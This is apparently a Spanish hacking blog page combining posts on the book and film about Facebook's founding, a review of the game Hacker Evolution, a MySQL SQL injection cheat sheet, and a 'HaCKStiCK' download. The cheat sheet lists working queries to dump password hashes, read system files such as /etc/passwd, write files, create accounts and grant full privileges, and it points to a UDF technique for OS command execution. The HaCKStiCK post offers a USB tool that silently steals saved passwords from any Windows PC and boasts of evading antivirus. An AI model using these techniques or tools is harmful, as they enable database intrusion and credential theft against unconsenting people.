The Social Network

Era inevitable que tarde o temprano alguien escribiera algo sobre la creación de una de los proyectos mas revolucionarios de los últimos tiempos. Hablo del libro «Multimillonarios por accidente: El nacimiento de Facebook. Una historia de Sexo, Dinero, Talento y Traición«(amazon.com), de Ben Mezrich. En este libro se relatan los años universitarios de Mark Zuckerberg relacionados con la creación de Facebook, el cual en un principio no era más que una recopilación de las fotografías de los miembros de las residencias de Harvard a modo de anuario. Lo que hasta hace unos días me hacía revolver las neuronas era el motivo del estallido que tubo una web de este tipo, propagándose a tal velocidad y a tan gran escala sin inversión de marketing ni nada por el estilo, pues suponía que en un principio solo subirían su foto a este sistema inicial un número reducido de miembros, que serían los amiguetes del Zuckerberg, pero me equivocaba por completo. Zuckerberg consiguió tener publicadas en su web las fotos de absolutamente todos los miembros de residencias antes mentados, sin su consentimiento inicial, obteniendo las fotos por medio de sus conocimientos sobre seguridad informática a través de las páginas de las residencias.

El propio Mark llevaba un blog en el que detallaría todas sus peripecias y acciones en todos los servidores de las residencias, cómo accedía a ellos, que mecanismos tuvo que romper, dificultades que se encontraba, número de cervezas que llevaba según tecleaba, etc.

Podréis encontrar más información acerca de estas actividades en SecurityByDefault
Parece que como todo en esta vida el esfuerzo siempre es recompensado, de una manera o de otra, siempre y cuando te encuentres FUERA de españa, claro.
Aquí el trailer de la película basada en el libro anteriormente citado:

1

Tabla de Trucos para Inyección de SQL

Versión SELECT @@version
Comentarios SELECT 1; #comentario
SELECT /*comentario*/1;
Usuario Actual SELECT user();
SELECT system_user();
Listar Usuarios SELECT user FROM mysql.user; — priv
Listar Hashes de Passwords SELECT host, user, password FROM mysql.user; — priv
Crackear Passwords John the Ripper crackea hashes de MySQL.
Listar privilegios SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges; — list user privs
SELECT host, user, Select_priv, Insert_priv, Update_priv, Delete_priv, Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv, File_priv, Grant_priv, References_priv, Index_priv, Alter_priv, Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv, Execute_priv, Repl_slave_priv, Repl_client_priv FROM mysql.user; — priv, list user privs
SELECT grantee, table_schema, privilege_type FROM information_schema.schema_privileges; — list privs on databases (schemas)
SELECT table_schema, table_name, column_name, privilege_type FROM information_schema.column_privileges; — list privs on columns
Listar cuentas DBA SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE privilege_type = ‘SUPER’;
SELECT host, user FROM mysql.user WHERE Super_priv = ‘Y’; # priv
Base de Datos Actual SELECT database()
Listar Bases de Datos SELECT schema_name FROM information_schema.schemata; — for MySQL >= v5.0
SELECT distinct(db) FROM mysql.db — priv
Listar Columnas SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’
Listar Tablas SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’
Encontrar Tablas apartir de un nombre de Columna SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = ‘username’; — en cuentra las tablas con columnas llamadas ‘username’
Seleccionar la N Fila SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 0; # filas numeradas desde 0
SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 1; # filas numeradas desde 0
Seleccionar el N caracter SELECT substr(‘abcd’, 3, 1); # devuelve c
AND Bit a Bit SELECT 6 & 2; # devuelve 2
SELECT 6 & 1; # devuelve 0
Valor ASCII -> Caracter SELECT char(65); # devuelve A
Char -> ASCII Value SELECT ascii(‘A’); # returns 65
Casting SELECT cast(‘1′ AS unsigned integer);
SELECT cast(‘123′ AS char);
Concatenación de cadenas SELECT CONCAT(‘A’,’B’); #devuelve AB
SELECT CONCAT(‘A’,’B’,’C’); # devuelve ABC
Sentencia IF SELECT if(1=1,’foo’,’bar’); — devuelve ‘foo’
Sentencia CASE SELECT CASE WHEN (1=1) THEN ‘A’ ELSE ‘B’ END; # devuelve A
Evitar Comillas SELECT 0×414243; # devuelve ABC
Demora de Tiempo SELECT BENCHMARK(1000000,MD5(‘A’));
SELECT SLEEP(5); # >= 5.0.12
Hacer Peticiones DNS ¿Imposible?
Ejecución de Comandios Si mysqld (<5.0) se ejecuta como root Y te haces con una cuenta DBA podrás ejecutar comandos del SO subiendo un archivo compartido a /usr/lib(o similar). El archivo .so debe contener una Función de Usuario Definida (UDF). raptor_udf.c explica exactamente como puedes hacerlo. Recuerda compilar para la arquitectura del objetivo pues no tiene porque ser la misma que la del atacante.
Acceso a Archivos Locales …’ UNION ALL SELECT LOAD_FILE(‘/etc/passwd’) — priv, solo puede leer archivos de lectura universales.
SELECT * FROM mytable INTO dumpfile ‘/tmp/somefile’; — priv, escribir en archivo de sistema
Hostname, Dirección IP ¿Imposible?
Crear Usuarios CREATE USER test1 IDENTIFIED BY ‘pass1′; — priv
Borrar Usuarios DROP USER test1; — priv
Make User DBA GRANT ALL PRIVILEGES ON *.* TO test1@’%’; — priv
Localización de los archivos de BD SELECT @@datadir;
Default/System Databases information_schema (>= mysql 5.0)
mysql
1

HaCKStiCK

hacking
Descarga el archivo que hay más abajo y sigue las instrucciones que vienen a continuación, para descubrir lo vulnerable que es nuestra información ante cualquier persona malintencionada:
-Descomprime el archivo en una memoria USB
-Introduce la memoria en cualquier ordenador con Windows.
-Se creará en la memoria USB una subcarpeta en «/Dump/» con el nombre del equipo.
-Dentro de esta encontrarás diversos archivos en formato html con información del tipo:

Contraseñas de Messenger

Contraseñas de Internet Explorer

Contraseñas de Firefox

Contraseñas de Outlook

Contraseñas de las redes Wireless

Puertos Abiertos

Información Relevante sobre el equipo

-Por cada equipo diferente en el que introduzcas la memoria se creará una carpeta diferente
NO ES UN KEYLOGGER. Las contraseñas se consiguen EN EL ACTO, no hay que esperar a que nadie las escriba, tan solo que las contraseñas estén guardadas en el equipo (Tipo «Recordar Contraseña»). TAMPOCO es un TROYANO. No deja ni rastro en el equipo, y no es detectado por la mayoría de los ANTIVIRUS. Un Firewall, en todo caso, lo detectaría como MALWARE.
Ni que decir tiene que es uno de los archivos más utiles que he puesto en esta web, XD

DESCARGAR

Las utilidades utilizadas en esta compilación, y muchas más, las podreis encontrar en http://www.nirsoft.net/

Protégete de ataques de este tipo utilizando: Comodo Free Firewall

1

Hacker Evolution (2007)

hackerevolution2

Hacker Evolution es un juego que nos pone en una situación futura catastrófica:
Las finanzas digitales se han colapsado y los gobiernos sospechan que se trata de un hacker. La única forma de atraparlo es utilizando a un antiguo agente del gobierno con altos conocimientos infórmaticos.

Ese eres tu.

hackerevolution1

Deberas utilizar tu consola de administración para ir superando obstáculos y llegar a esclarecer la verdad. Y además, lo harás de forma literal, porque el juego se controla como si de un hacker se tratase: con comandos desde una consola hacia servidores. Aunque el juego es muy simple gráficamente, su mecánica de juego es muy atractiva, ya que cada uno de los servers que tengas que «hackear» te ofrecerá todo un desafío a tu inteligencia. Utiliza toda clase de comandos para introducirte en ellos antes de que localicen tu ubicación, momento en el que se acabará tu partida.
Lo mejor, sin duda, la música que te ofrece un impresionante repertorio de melodías mientras intentas coger al que ha provocado el colapso financiero mundial.

Descargar
Pass: altocielo.es
1